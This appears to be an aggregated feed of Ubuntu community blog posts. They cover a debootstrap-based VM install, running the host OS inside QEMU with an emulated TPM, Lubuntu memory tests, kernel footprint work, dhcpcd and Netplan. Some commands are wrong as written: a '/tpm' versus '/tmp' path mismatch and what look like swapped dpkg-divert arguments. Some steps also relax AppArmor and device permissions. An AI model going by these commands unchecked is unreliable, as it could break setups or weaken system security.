This guide is going to be focused on doing a manual installation of Ubuntu into a VM, using debootstrap to install the initial minimal system. You can use this same technique to install Ubuntu onto physical hardware by just booting from a live USB and then using this technique on your hardware’s physical disk(s). However we’re going to be primarily focused on using a VM right now. Also, the virtualization software we’re going to be working with is QEMU. If you’re using a different hypervisor like VMware, VirtualBox, or Hyper-V, you can make a new VM and then install Ubuntu manually into it the same way you would install Ubuntu onto physical hardware using this technique. QEMU, however, provides special tools that make this procedure easier, and QEMU is more flexible than other virtualization software in my experience. You can install it by running sudo apt install qemu-system-x86 on your host system.

With that laid out, let us begin.

Open a terminal on your physical machine, and make a directory for your new VM to reside in. I’ll use “~/VMs/Ubuntu” here.

mkdir ~/VMs/Ubuntu
cd ~/VMs/Ubuntu

Next, let’s make a virtual disk image for the VM using the qemu-img utility.

qemu-img create -f qcow2 ubuntu.img 32G

This will make a 32 GiB disk image - feel free to customize the size or filename as you see fit. The -f parameter at the beginning specifies the VM disk image format. QCOW2 is usually a good option since the image will start out small and then get bigger as necessary. However, if you’re already using a copy-on-write filesystem like BTRFS or ZFS, you might want to use -f raw rather than -f qcow2 - this will make a raw disk image file and avoid the overhead of the QCOW2 file format.

Now we need to attach the disk image to the host machine as a device. I usually do this with you can use qemu-nbd, which can attach a QEMU-compatible disk image to your physical system as a network block device. These devices look and work just like physical disks, which makes them extremely handy for modifying the contents of a disk image.

qemu-nbd requires that the nbd kernel module be loaded, and at least on Ubuntu, it’s not loaded by default, so we need to load it before we can attach the disk image to our host machine.

sudo modprobe nbd
sudo qemu-nbd -f qcow2 -c /dev/nbd0 ./ubuntu.img

This will make our ubuntu.img file available through the /dev/nbd0 device. Make sure to specify the format via the -f switch, especially if you’re using a raw disk image. QEMU will keep you from writing a new partition table to the disk image if you give it a raw disk image without telling it directly that the disk image is raw.

Once your disk image is attached, we can partition it and format it just like a real disk. For simplicity’s sake, we’ll give the drive an MBR partition table, create a single partition enclosing all of the disk’s space, then format the partition as ext4.

sudo fdisk /dev/nbd0
n
p
1


w
sudo mkfs.ext4 /dev/nbd0p1

(The two blank lines are intentional - they just accept the default options for the partition’s first and last sector, which makes a partition that encloses all available space on the disk.)

Now we can mount the new partition.

mkdir vdisk
sudo mount /dev/nbd0p1 ./vdisk

Now it’s time to install the minimal Ubuntu system. You’ll need to know the first part of the codename for the Ubuntu version you intend to install. The codenames for Ubuntu releases are an adjective followed by the name of an animal, like “Jammy Jellyfish”. The first word (“Jammy” in this instance) is the one you need. These codenames are easy to look up online. Here’s the codenames for the currently supported LTS versions of Ubuntu, as well as the codename for the current development release:

+-------------------+-------+
| 20.04 | Focal |
|-------------------+-------+
| 22.04 | Jammy |
|-------------------+-------+
| 24.04 Development | Noble |
|-------------------+-------+

To install the initial minimal Ubuntu system, we’ll use the debootstrap utility. This utility will download and install the bare minimum packages needed to have a functional Ubuntu system. Keep in mind that the Ubuntu installation this tool makes is really minimal - it doesn’t even come with a bootloader or Linux kernel. We’ll need to make quite a few changes to this installation before it’s ready for use in a VM.

Assuming we’re installing Ubuntu 22.04 LTS into our VM, the command to use is:

sudo debootstrap jammy ./vdisk

After a few minutes, our new system should be downloaded and installed. (Note that debootstrap does require root privileges.)

Now we’re ready to customize the VM! To do this, we’ll use a utility called chroot - this utility allows us to “enter” an installed Linux system, so we can modify with it without having to boot it. (This is done by changing the root directory (from the perspective of the chroot process) to whatever directory you specify, then launching a shell or program inside the specified directory. The shell or program will see its root directory as being the directory you specified, and volia, it’s as if we’re “inside” the installed system without having to boot it. This is a very weak form of containerization and shouldn’t be relied on for security, but it’s perfect for what we’re doing.)

There’s one thing we have to account for before chrooting into our new Ubuntu installation. Some commands we need to run will assume that certain special directories are mounted properly - in particular, /proc should point to a procfs filesystem, /sys should point to a sysfs filesystem, /dev needs to contain all of the device files of our system, and /dev/pts needs to contain the device files for pseudoterminals (you don’t have to know what any of that means, just know that those four directories are important and have to be set up properly). If these directories are not properly mounted, some tools will behave strangely or not work at all. The easiest way to solve this problem is with bind mounts. These basically tell Linux to make the contents of one directory visible in some other directory too. (These are sort of like symlinks, but they work differently - a symlink says “I’m a link to something, go over here to see what I contain”, whereas a bind mount says “make this directory’s contents visible over here too”. The differences are subtle but important - a symlink can’t make files outside of a chroot visible inside the chroot. A bind mount, however, can.)

So let’s bind mount the needed directories from our system into the chroot:

sudo mount --bind /dev ./vdisk/dev
sudo mount --bind /proc ./vdisk/proc
sudo mount --bind /sys ./vdisk/sys
sudo mount --bind /dev/pts ./vdisk/dev/pts

And now we can chroot in!

sudo chroot ./vdisk

Run ping -c1 8.8.8.8 just to make sure that Internet access is working - if it’s not, you may need to copy the host’s /etc/resolv.conf file into the VM. However, you probably won’t have to do this. Assuming Internet is working, we can now start customizing things.

By default, debootstrap only enables the “main” repository of Ubuntu. This repository only contains free-and-open-source software that is supported by Canonical. This does *not* include most of the software available in Ubuntu - most of it is in the “universe”, “restricted”, and “multiverse” repositories. If you really know what you’re doing, you can leave some of these repositories out, but I would highly recommend you enable them. Also, only the “release” pocket is enabled by default - this pocket includes all of the software that came with your chosen version of Ubuntu when it was first released, but it doesn’t include bug fixes, security updates, or newer versions of software. All those are in the “updates”, “security”, and “backports” pockets.

To fix this, run the following block of code, adjusted for your release of Ubuntu:

tee /etc/apt/sources.list << ENDSOURCESLIST
deb http://archive.ubuntu.com/ubuntu jammy main universe restricted multiverse
deb http://archive.ubuntu.com/ubuntu jammy-updates main universe restricted multiverse
deb http://archive.ubuntu.com/ubuntu jammy-security main universe restricted multiverse
deb http://archive.ubuntu.com/ubuntu jammy-backports main universe restricted multiverse
ENDSOURCESLIST

Replace “jammy” with the codename corresponding to your chosen release of Ubuntu. Once you’ve run this, run cat /etc/apt/sources.list to make sure the file looks right, then run apt update to refresh your software database with the newly enabled repositories. Once that’s done, run apt full-upgrade to update any software in the base installation that’s out-of-date.

What exactly you install at this point is up to you, but here’s my list of recommendations:

  • linux-generic. Highly recommended. This provides the Linux kernel. Without it, you’re going to have significant trouble booting. You can replace this with a different kernel metapackage if you want to for some reason (like linux-lowlatency).

  • grub-pc. Highly recommended. This is the bootloader. You might be able to replace this with an alternative bootloader like systemd-boot.

  • vim (or some other decent text editor that runs in a terminal). Highly recommended. The minimal install of Ubuntu doesn’t come with a good text editor, and you’ll really want one of those most likely.

  • network-manager. Highly recommended. If you don’t install this or some other network manager, you won’t have Internet access. You can replace this with an alternative network manager if you’d like.

  • tmux. Recommended. Unless you’re going to install a graphical environment, you’ll probably want a terminal multiplexer so you don’t have to juggle TTYs (which is especially painful in QEMU).

  • openssh-server. Optional. This is handy since it lets you use your terminal emulator of choice on your physical machine to interface with the virtual machine. You won’t be stuck using a rather clumsy and slow TTY in a QEMU display.

  • pulseaudio. Very optional. Provides sound support within the VM.

  • icewm + xserver-xorg + xinit + xterm. Very optional. If you need or want a graphical environment, this should provide you with a fairly minimal and fast one. You’ll still log in at a TTY, but you can use startx to start a desktop.

Add whatever software you want to this list, remove whatever you don’t want, and then install it all with this command:

apt install listOfPackages

Replace “listOfPackages” with the actual list of packages you want to install. For instance, if I were to install everything in the above list except openssh-server, I would use:

apt install linux-generic grub-pc vim network-manager tmux icewm xserver-xorg xinit xterm

At this point our software is installed, but the VM still has a few things needed to get it going.

  • We need to install and configure the bootloader.

  • We need an /etc/fstab file, or the system will boot with the drive mounted read-only.

  • We should probably make a non-root user with sudo access.

  • There’s a file in Ubuntu that will prevent Internet access from working. We should delete it now.

The bootloader is pretty easy to install and configure. Just run:

sudo grub-install /dev/nbd0
sudo update-grub

For /etc/fstab, there are a few options. One particularly good one is to label the partition we installed Ubuntu into using e2label, then use that label as the ID of the drive we want to mount as root. That can be done like this:

e2label /dev/nbd0p1 ubuntu-inst
echo "LABEL=ubuntu-inst / ext4 defaults 0 1" > /etc/fstab

Making a user account is fairly easy:

adduser user # follow the prompts to create the user
adduser user sudo

And lastly, we should remove the Internet blocker file. I don’t understand why exactly this file exists in Ubuntu, but it does, and it causes problems for me when I make a minimal VM in this way. Removing it fixes the problem.

rm /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf

EDIT: January 21, 2024: This rm command doesn’t actually work forever - an update to NetworkManager can end up putting this file back, breaking networking again. Rather than using rm on it, you should dpkg-divert it somewhere benign, for instance with dpkg-divert --divert /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf --rename /var/nm-globally-managed-devices-junk.old, which should persist even after an update.

And that’s it! Now we can exit the chroot, unmount everything, and detach the disk image from our host machine.

exit
sudo umount ./vdisk/dev/pts
sudo umount ./vdisk/dev
sudo umount ./vdisk/proc
sudo umount ./vdisk/sys
sudo umount ./vdisk
sudo qemu-nbd -d /dev/nbd0

Now we can try and boot the VM. But before doing that, it’s probably a good idea to make a VM launcher script. Run vim ./startVM.sh (replacing “vim” with your text editor of choice), then type the following contents into the file:

#!/bin/bash
qemu-system-x86_64 -enable-kvm -machine q35 -m 4G -smp 2 -vga qxl -display sdl -monitor stdio -device intel-hda -device hda-duplex -usb -device usb-tablet -drive file=./ubuntu.img,format=qcow2,if=virtio

Refer to the qemu-system-x86_64 manpage or QEMU Invocation documentation page at https://www.qemu.org/docs/master/system/invocation.html for more info on what all these options do. Basically this gives you a VM with 4 GB RAM, 2 CPU cores, decent graphics (not 3d accelerated but not as bad as plain VGA), and audio support. You can tweak the amount of RAM and number of CPU cores by changing the -m and -smp parameters respectively. You’ll have access to the QEMU monitor through whatever terminal you run the launcher script in, allowing you to do things like switch to a different TTY, insert and remove devices and storage media on the fly, and things like that.

Finally, it’s time to see if it works.

chmod +x ./startVM.sh
./startVM.sh

If all goes well, the VM should boot and you should be able to log in! If you installed IceWM and its accompanying software like mentioned earlier, try running startx once you log in. This should pop open a functional IceWM desktop.

Some other things you should test once you’re logged in:

  • Do you have Internet access? ping -c1 8.8.8.8 can be used to test. If you don’t have Internet, run sudo nmtui in a terminal and add a new Ethernet network within the VM, then try activating it. If you get an error about the Ethernet device being strictly unmanaged, you probably forgot to remove the /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf file mentioned earlier.

  • Can you write anything to the drive? Try running touch test to make sure. If you can’t, you probably forgot to create the /etc/fstab file.

If either of these things don’t work, you can power off the VM, then re-attach the VM’s virtual disk to your host machine, mount it, and chroot in like this:

sudo qemu-nbd -f qcow2 -c /dev/nbd0 ./ubuntu.img
sudo mount /dev/nbd0p1 ./vdisk
sudo chroot vdisk

Since all you’ll be doing is writing or removing a file, you don’t need to bind mount all the special directories we had to work with earlier.

Once you’re done fixing whatever is wrong, you can exit the VM, unmount and detach its disk, and then try to boot it again like this:

exit
sudo umount vdisk
sudo qemu-nbd -d /dev/nbd0
./startVM.sh

You now have a fully functional, minimal VM! Some extra tips that you may find handy:

  • If you choose to install an SSH server into your VM, you can use the “hostfwd” setting in QEMU to forward a port on your local machine to port 22 within the VM. This will allow you to SSH into the VM. Add a parameter like -nic user,hostfwd=tcp:127.0.0.1:2222-:22 to your QEMU command in the “startVM.sh” script. This will forward port 2222 of your host machine to port 22 of the VM. Then you can SSH into the VM by running ssh user@127.0.0.1 -p 2222. The “hostfwd” QEMU feature is documented at https://www.qemu.org/docs/master/system/invocation.html - just search the page for “hostfwd” to find it.

  • If you intend to use the VM through SSH only and don’t want a QEMU window at all, remove the following three parameters from the QEMU command in “startVM.sh”:

    • -vga qxl

    • -display sdl

    • -monitor stdio

    Then add the following switch:

    • -nographic

    This will disable the graphical QEMU window entirely and provide no video hardware to the VM.

  • You can disable sound support by removing the following switches from the QEMU command in “startVM.sh”:

    • -device intel-hda

    • -device hda-duplex

There’s lots more you can do with QEMU and manual Ubuntu installations like this, but I think this should give you a good start. Hope you find this useful! God bless.

Thanks for reading Arraybolt's Archives! Subscribe for free to receive new posts and support my work.

on November 30, 2023 10:34 PM

November 25, 2023

In 2020 I reviewed LiveCD memory usage.

I was hoping to review either Wayland only or immutable only (think ostree/flatpak/snaps etc) but for various reasons on my setup it would just be a Gnome compare and that's just not as interesting. There are just to many distros/variants for me to do a full followup.

Lubuntu has previously always been the winner, so let's just see how Lubuntu 23.10 is doing today.

Previously in 2020 Lubuntu needed to get to 585 MB to be able to run something with a livecd. With a fresh install today Lubuntu can still launch Qterminal with just 540 MB of RAM (not apples to apples, but still)! And that's without Zram that it had last time.

I decided to try removing some parts of the base system to see the cost of each component (with 10MB accuracy). I disabled networking to try and make it a fairer compare.

  • Snapd - 30 MiB
  • Printing - cups foomatic - 10 MiB
  • rsyslog/crons - 10 MiB

Rsyslog impact

Out of the 3 above it's felt more like with rsyslog (and cron) are redundant in modern Linux with systemd. So I tried hitting the log system to see if we could get a slowdown, by every .1 seconds having a service echo lots of gibberish.

After an hour of uptime, this is how much space was used:

  • syslog 575M
  • journal at 1008M

CPU Usage on fresh boot after:

With Rsyslog

  • gibberish service was at 1% CPU usage
  • rsyslog was at 2-3%
  • journal was at ~4%

Without Rsyslog

  • gibberish service was at 1% CPU usage
  • journal was at 1-3%

That's a pretty extreme case, but does show some impact of rsyslog, which in most desktop settings is redundant anyway.

Testing notes:

  • 2 CPUs (Copy host config)
  • Lubuntu 23.10 install
  • no swap file
  • ext4, no encryption
  • login automatically
  • Used Virt-manager and only default change was enabling EUFI
on November 25, 2023 02:42 AM

November 19, 2023

In this article I will show you how to start your current operating system inside a virtual machine. That is: launching the operating system (with all your settings, files, and everything), inside a virtual machine, while you’re using it.

This article was written for Ubuntu, but it can be easily adapted to other distributions, and with appropriate care it can be adapted to non-Linux kernels and operating systems as well.

Motivation

Before we start, why would a sane person want to do this in the first place? Well, here’s why I did it:

  • To test changes that affect Secure Boot without a reboot.

    Recently I was doing some experiments with Secure Boot and the Trusted Platform Module (TPM) on a new laptop, and I got frustrated by how time consuming it was to test changes to the boot chain. Every time I modified a file involved during boot, I would need to reboot, then log in, then re-open my terminal windows and files to make more modifications… Plus, whenever I screwed up, I would need to manually recover my system, which would be even more time consuming.

    I thought that I could speed up my experiments by using a virtual machine instead.

  • To predict the future TPM state (in particular, the values of PCRs 4, 5, 8, and 9) after a change, without a reboot.

    I wanted to predict the values of my TPM PCR banks after making changes to the bootloader, kernel, and initrd. Writing a script to calculate the PCR values automatically is in principle not that hard (and I actually did it before, in a different context), but I wanted a robust, generic solution that would work on most systems and in most situations, and emulation was the natural choice.

  • And, of course, just for the fun of it!

To be honest, I’m not a big fan of Secure Boot. The reason why I’ve been working on it is simply that it’s the standard nowadays and so I have to stick with it. Also, there are no real alternatives out there to achieve the same goals. I’ll write an article about Secure Boot in the future to explain the reasons why I don’t like it, and how to make it work better, but that’s another story…

Procedure

The procedure that I’m going to describe has 3 main steps:

  1. create a copy of your drive
  2. emulate a TPM device using swtpm
  3. emulate the system with QEMU

I’ve tested this procedure on Ubuntu 23.04 (Lunar) and 23.10 (Mantic), but it should work on any Linux distribution with minimal adjustments. The general approach can be used for any operating system, as long as appropriate replacements for QEMU and swtpm exist.

Prerequisites

Before we can start, we need to install:

  • QEMU: a virtual machine emulator
  • swtpm: a TPM emulator
  • OVMF: a UEFI firmware implementation

On a recent version of Ubuntu, these can be installed with:

sudo apt install qemu-system-x86 ovmf swtpm

Note that OVMF only supports the x86_64 architecture, so we can only emulate that. If you run a different architecture, you’ll need to find another UEFI implementation that is not OVMF (but I’m not aware of any freely available ones).

Create a copy of your drive

We can decide to either:

  • Choice #1: run only the components involved early at boot (shim, bootloader, kernel, initrd). This is useful if you, like me, only need to test those components and how they affect Secure Boot and the TPM, and don’t really care about the rest (the init process, login manager, …).

  • Choice #2: run the entire operating system. This can give you a fully usable operating system running inside the virtual machine, but may also result in some instability inside the guest (because we’re giving it a filesystem that is in use), and may also lead to some data loss if we’re not careful and make typos. Use with care!

Choice #1: Early boot components only

If we’re interested in the early boot components only, then we need to make a copy the following from our drive: the GPT partition table, the EFI partition, and the /boot partition (if we have one). Usually all these 3 pieces are at the “start” of the drive, but this is not always the case.

To figure out where the partitions are located, run:

sudo parted -l

On my system, this is the output:

Model: WD_BLACK SN750 2TB (nvme)
Disk /dev/nvme0n1: 2000GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Disk Flags:

Number  Start   End     Size    File system  Name  Flags
 1      1049kB  525MB   524MB   fat32              boot, esp
 2      525MB   1599MB  1074MB  ext4
 3      1599MB  2000GB  1999GB                     lvm

In my case, the partition number 1 is the EFI partition, and the partition number 2 is the /boot partition. If you’re not sure what partitions to look for, run mount | grep -e /boot -e /efi. Note that, on some distributions (most notably the ones that use systemd-boot), a /boot partition may not exist, so you can leave that out in that case.

Anyway, in my case, I need to copy the first 1599 MB of my drive, because that’s where the data I’m interested in ends: those first 1599 MB contain the GPT partition table (which is always at the start of the drive), the EFI partition, and the /boot partition.

Now that we have identified how many bytes to copy, we can copy them to a file named drive.img with dd (maybe after running sync to make sure that all changes have been committed):

# replace '/dev/nvme0n1' with your main drive (which may be '/dev/sda' instead),
# and 'count' with the number of MBs to copy
sync && sudo -g disk dd if=/dev/nvme0n1 of=drive.img bs=1M count=1599 conv=sparse

Choice #2: Entire system

If we want to run our entire system in a virtual machine, then I would recommend creating a QEMU copy-on-write (COW) file:

# replace '/dev/nvme0n1' with your main drive (which may be '/dev/sda' instead)
sudo -g disk qemu-img create -f qcow2 -b /dev/nvme0n1 -F raw drive.qcow2

This will create a new copy-on-write image using /dev/nvme0n1 as its “backing storage”. Be very careful when running this command: you don’t want to mess up the order of the arguments, or you might end up writing to your storage device (leading to data loss)!

The advantage of using a copy-on-write file, as opposed to copying the whole drive, is that this is much faster. Also, if we had to copy the entire drive, we might not even have enough space for it (even when using sparse files).

The big drawback of using a copy-on-write file is that, because our main drive likely contains filesystems that are mounted read-write, any modification to the filesystems on the host may be perceived as data corruption on the guest, and that in turn may cause all sort of bad consequences inside the guest, including kernel panics.

Another drawback is that, with this solution, later we will need to give QEMU permission to read our drive, and if we’re not careful enough with the commands we type (e.g. we swap the order of some arguments, or make some typos), we may potentially end up writing to the drive instead.

Emulate a TPM device using swtpm

There are various ways to run the swtpm emulator. Here I will use the “vTPM proxy” way, which is not the easiest, but has the advantage that the emulated device will look like a real TPM device not only to the guest, but also to the host, so that we can inspect its PCR banks (among other things) from the host using familiar tools like tpm2_pcrread.

First, enable the tpm_vtpm_proxy module (which is not enabled by default on Ubuntu):

sudo modprobe tpm_vtpm_proxy

If that worked, we should have a /dev/vtpmx device. We can verify its presence with:

ls /dev/vtpmx

swtpm in “vTPM proxy” mode will interact with /dev/vtpmx, but in order to do so it needs the sys_admin capability. On Ubuntu, swtpm ships with this capability explicitly disabled by AppArmor, but we can enable it with:

sudo sh -c "echo '  capability sys_admin,' > /etc/apparmor.d/local/usr.bin.swtpm"
systemctl reload apparmor

Now that /dev/vtpmx is present, and swtpm can talk to it, we can run swtpm in “vTPM proxy” mode:

sudo mkdir /tpm/swtpm-state
sudo swtpm chardev --tpmstate dir=/tmp/swtpm-state --vtpm-proxy --tpm2

Upon start, swtpm should create a new /dev/tpmN device and print its name on the terminal. On my system, I already have a real TPM on /dev/tpm0, and therefore swtpm allocates /dev/tpm1.

The emulated TPM device will need to be readable and writeable by QEMU, but the emulated TPM device is by default accessible only by root, so either we run QEMU as root (not recommended), or we relax the permissions on the device:

# replace '/dev/tpm1' with the device created by swtpm
sudo chmod a+rw /dev/tpm1

Make sure not to accidentally change the permissions of your real TPM device!

Emulate the system with QEMU

Inside the QEMU emulator, we will run the OVMF UEFI firmware. On Ubuntu, the firmware comes in 2 flavors:

  • with Secure Boot enabled (/usr/share/OVMF/OVMF_CODE_4M.ms.fd), and
  • with Secure Boot disabled (in /usr/share/OVMF/OVMF_CODE_4M.fd)

(There are actually even more flavors, see this AskUbuntu question for the details.)

In the commands that follow I’m going to use the Secure Boot flavor, but if you need to disable Secure Boot in your guest, just replace .ms.fd with .fd in all the commands below.

To use OVMF, first we need to copy the EFI variables to a file that can be read & written by QEMU:

cp /usr/share/OVMF/OVMF_VARS_4M.ms.fd /tmp/

This file (/tmp/OVMF_VARS_4M.ms.fd) will be the equivalent of the EFI flash storage, and it’s where OVMF will read and store its configuration, which is why we need to make a copy of it (to avoid modifications to the original file).

Now we’re ready to run QEMU:

  • If you copied only the early boot files (choice #1):

    # replace '/dev/tpm1' with the device created by swtpm
    qemu-system-x86_64 \
      -accel kvm \
      -machine q35,smm=on \
      -cpu host \
      -smp cores=4,threads=1 \
      -m 4096 \
      -vga virtio \
      -bios /usr/share/ovmf/OVMF.fd \
      -drive if=pflash,unit=0,format=raw,file=/usr/share/OVMF/OVMF_CODE_4M.ms.fd,readonly=on \
      -drive if=pflash,unit=1,format=raw,file=/tmp/OVMF_VARS_4M.ms.fd \
      -drive if=virtio,format=raw,file=drive.img \
      -tpmdev passthrough,id=tpm0,path=/dev/tpm1,cancel-path=/dev/null \
      -device tpm-tis,tpmdev=tpm0
    
  • If you have a copy-on-write file for the entire system (choice #2):

    # replace '/dev/tpm1' with the device created by swtpm
    sudo -g disk qemu-system-x86_64 \
      -accel kvm \
      -machine q35,smm=on \
      -cpu host \
      -smp cores=4,threads=1 \
      -m 4096 \
      -vga virtio \
      -bios /usr/share/ovmf/OVMF.fd \
      -drive if=pflash,unit=0,format=raw,file=/usr/share/OVMF/OVMF_CODE_4M.ms.fd,readonly=on \
      -drive if=pflash,unit=1,format=raw,file=/tmp/OVMF_VARS_4M.ms.fd \
      -drive if=virtio,format=qcow2,file=drive.qcow2 \
      -tpmdev passthrough,id=tpm0,path=/dev/tpm1,cancel-path=/dev/null \
      -device tpm-tis,tpmdev=tpm0
    

    Note that this last command makes QEMU run as the disk group: on Ubuntu, this group has the permission to read and write all storage devices, so be careful when running this command, or you risk losing your files forever! If you want to add more safety, you may consider using an ACL to give the user running QEMU read-only permission to your backing storage.

In either case, after launching QEMU, our operating system should boot… while running inside itself!

In some circumstances though it may happen that the wrong operating system is booted, or that you end up at the EFI setup screen. This can happen if your system is not configured to boot from the “first” EFI entry listed in the EFI partition. Because the boot order is not recorded anywhere on the storage device (it’s recorded in the EFI flash memory), of course OVMF won’t know which operating system you intended to boot, and will just attempt to launch the first one it finds. You can use the EFI setup screen provided by OVMF to change the boot order in the way you like. After that, changes will be saved into the /tmp/OVMF_VARS_4M.ms.fd file on the host: you should keep a copy of that file so that, next time you launch QEMU, you’ll boot directly into your operating system.

Reading PCR banks after boot

Once our operating system has launched inside QEMU, and after the boot process is complete, the PCR banks will be filled and recorded by swtpm.

If we choose to copy only the early boot files (choice #1), then of course our operating system won’t be fully booted: it’ll likely hang waiting for the root filesystem to appear, and may eventually drop to the initrd shell. None of that really matters if all we want is to see the PCR values stored by the bootloader.

Before we can extract those PCR values, we first need to stop QEMU (Ctrl-C is fine), and then we can read it with tpm2_pcrread:

# replace '/dev/tpm1' with the device created by swtpm
tpm2_pcrread -T device:/dev/tpm1

Using the method described here in this article, PCRs 4, 5, 8, and 9 inside the emulated TPM should match the PCRs in our real TPM. And here comes an interesting application of this method: if we upgrade our bootloader or kernel, and we want to know the future PCR values that our system will have after reboot, we can simply follow this procedure and obtain those PCR values without shutting down our system! This can be especially useful if we use TPM sealing: we can reseal our secrets and make them unsealable at the next reboot without trouble.

Restarting the virtual machine

If we want to restart the guest inside the virtual machine, and obtain a consistent TPM state every time, we should start from a “clean” state every time, which means:

  1. restart swtpm
  2. recreate the drive.img or drive.qcow2 file
  3. launch QEMU again

If we don’t restart swtpm, the virtual TPM state (and in particular the PCR banks) won’t be cleared, and new PCR measurements will simply be added on top of the existing state. If we don’t recreate the drive file, it’s possible that some modifications to the filesystems will have an impact on the future PCR measurements.

We don’t necessarily need to recreate the /tmp/OVMF_VARS_4M.ms.fd file every time. In fact, if you need to modify any EFI setting to make your system bootable, you might want to preserve it so that you don’t need to change EFI settings at every boot.

Automating the entire process

I’m (very slowly) working on turning this entire procedure into a script, so that everything can be automated. Once I find some time I’ll finish the script and publish it, so if you liked this article, stay tuned, and let me know if you have any comment/suggestion/improvement/critique!

on November 19, 2023 04:33 PM

November 16, 2023


Photo by Pixabay

Ubuntu systems typically have up to 3 kernels installed, before they are auto-removed by apt on classic installs. Historically the installation was optimized for metered download size only. However, kernel size growth and usage no longer warrant such optimizations. During the 23.10 Mantic Minatour cycle, I led a coordinated effort across multiple teams to implement lots of optimizations that together achieved unprecedented install footprint improvements.

Given a typical install of 3 generic kernel ABIs in the default configuration on a regular-sized VM (2 CPU cores 8GB of RAM) the following metrics are achieved in Ubuntu 23.10 versus Ubuntu 22.04 LTS:

  • 2x less disk space used (1,417MB vs 2,940MB, including initrd)

  • 3x less peak RAM usage for the initrd boot (68MB vs 204MB)

  • 0.5x increase in download size (949MB vs 600MB)

  • 2.5x faster initrd generation (4.5s vs 11.3s)

  • approximately the same total time (103s vs 98s, hardware dependent)


For minimal cloud images that do not install either linux-firmware or modules extra the numbers are:

  • 1.3x less disk space used (548MB vs 742MB)

  • 2.2x less peak RAM usage for initrd boot (27MB vs 62MB)

  • 0.4x increase in download size (207MB vs 146MB)


Hopefully, the compromise of download size, relative to the disk space & initrd savings is a win for the majority of platforms and use cases. For users on extremely expensive and metered connections, the likely best saving is to receive air-gapped updates or skip updates.


This was achieved by precompressing kernel modules & firmware files with the maximum level of Zstd compression at package build time; making actual .deb files uncompressed; assembling the initrd using split cpio archives - uncompressed for the pre-compressed files, whilst compressing only the userspace portions of the initrd; enabling in-kernel module decompression support with matching kmod; fixing bugs in all of the above, and landing all of these things in time for the feature freeze. Whilst leveraging the experience and some of the design choices implementations we have already been shipping on Ubuntu Core. Some of these changes are backported to Jammy, but only enough to support smooth upgrades to Mantic and later. Complete gains are only possible to experience on Mantic and later.


The discovered bugs in kernel module loading code likely affect systems that use LoadPin LSM with kernel space module uncompression as used on ChromeOS systems. Hopefully, Kees Cook or other ChromeOS developers pick up the kernel fixes from the stable trees. Or you know, just use Ubuntu kernels as they do get fixes and features like these first.


The team that designed and delivered these changes is large: Benjamin Drung, Andrea Righi, Juerg Haefliger, Julian Andres Klode, Steve Langasek, Michael Hudson-Doyle, Robert Kratky, Adrien Nader, Tim Gardner, Roxana Nicolescu - and myself Dimitri John Ledkov ensuring the most optimal solution is implemented, everything lands on time, and even implementing portions of the final solution.


Hi, It's me, I am a Staff Engineer at Canonical and we are hiring https://canonical.com/careers.


Lots of additional technical details and benchmarks on a huge range of diverse hardware and architectures, and bikeshedding all the things below:


For questions and comments please post to Kernel section on Ubuntu Discourse.



on November 16, 2023 10:45 AM

A lot of time has passed since my previous post on my work to make dhcpcd the drop-in replacement for the deprecated ISC dhclient a.k.a. isc-dhcp-client. Current status:

  • Upstream now regularly produces releases and with a smaller delta than before. This makes it easier to track possible breakage.
  • Debian packaging has essentially remained unchanged. A few Recommends were shuffled, but that's about it.
  • The only remaining bug is fixing the build for Hurd. Patches are welcome. Once that is fixed, bumping dhcpcd-base's priority to important is all that's left.
on November 16, 2023 09:38 AM

November 12, 2023

Ubuntu 23.10 “Mantic Minotaur” Desktop, showing network settings

We released Ubuntu 23.10 ‘Mantic Minotaur’ on 12 October 2023, shipping its proven and trusted network stack based on Netplan. Netplan is the default tool to configure Linux networking on Ubuntu since 2016. In the past, it was primarily used to control the Server and Cloud variants of Ubuntu, while on Desktop systems it would hand over control to NetworkManager. In Ubuntu 23.10 this disparity in how to control the network stack on different Ubuntu platforms was closed by integrating NetworkManager with the underlying Netplan stack.

Netplan could already be used to describe network connections on Desktop systems managed by NetworkManager. But network connections created or modified through NetworkManager would not be known to Netplan, so it was a one-way street. Activating the bidirectional NetworkManager-Netplan integration allows for any configuration change made through NetworkManager to be propagated back into Netplan. Changes made in Netplan itself will still be visible in NetworkManager, as before. This way, Netplan can be considered the “single source of truth” for network configuration across all variants of Ubuntu, with the network configuration stored in /etc/netplan/, using Netplan’s common and declarative YAML format.

Netplan Desktop integration

On workstations, the most common scenario is for users to configure networking through NetworkManager’s graphical interface, instead of driving it through Netplan’s declarative YAML files. Netplan ships a “libnetplan” library that provides an API to access Netplan’s parser and validation internals, which is now used by NetworkManager to store any network interface configuration changes in Netplan. For instance, network configuration defined through NetworkManager’s graphical UI or D-Bus API will be exported to Netplan’s native YAML format in the common location at /etc/netplan/. This way, the only thing administrators need to care about when managing a fleet of Desktop installations is Netplan. Furthermore, programmatic access to all network configuration is now easily accessible to other system components integrating with Netplan, such as snapd. This solution has already been used in more confined environments, such as Ubuntu Core and is now enabled by default on Ubuntu 23.10 Desktop.

Migration of existing connection profiles

On installation of the NetworkManager package (network-manager >= 1.44.2-1ubuntu1) in Ubuntu 23.10, all your existing connection profiles from /etc/NetworkManager/system-connections/ will automatically and transparently be migrated to Netplan’s declarative YAML format and stored in its common configuration directory /etc/netplan/

The same migration will happen in the background whenever you add or modify any connection profile through the NetworkManager user interface, integrated with GNOME Shell. From this point on, Netplan will be aware of your entire network configuration and you can query it using its CLI tools, such as “sudo netplan get” or “sudo netplan status” without interrupting traditional NetworkManager workflows (UI, nmcli, nmtui, D-Bus APIs). You can observe this migration on the apt-get command line, watching out for logs like the following:

Setting up network-manager (1.44.2-1ubuntu1.1) ...
Migrating HomeNet (9d087126-ae71-4992-9e0a-18c5ea92a4ed) to /etc/netplan
Migrating eduroam (37d643bb-d81d-4186-9402-7b47632c59b1) to /etc/netplan
Migrating DebConf (f862be9c-fb06-4c0f-862f-c8e210ca4941) to /etc/netplan

In order to prepare for a smooth transition, NetworkManager tests were integrated into Netplan’s continuous integration pipeline at the upstream GitHub repository. Furthermore, we implemented a passthrough method of handling unknown or new settings that cannot yet be fully covered by Netplan, making Netplan future-proof for any upcoming NetworkManager release.

The future of Netplan

